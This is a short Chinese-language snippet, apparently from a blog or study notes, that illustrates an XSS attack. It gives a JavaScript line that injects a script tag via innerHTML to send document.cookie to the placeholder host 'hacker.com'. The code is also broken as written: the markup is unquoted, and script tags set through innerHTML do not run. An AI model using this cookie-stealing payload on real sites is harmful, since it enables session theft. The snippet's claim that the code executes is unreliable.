安全XSS 攻击举例
div.innerHTML = (
<script>$.get('http://hacker.com?cookie='+document.cookie)</script>
);
// 恶意代码就被执行了
2018-06-10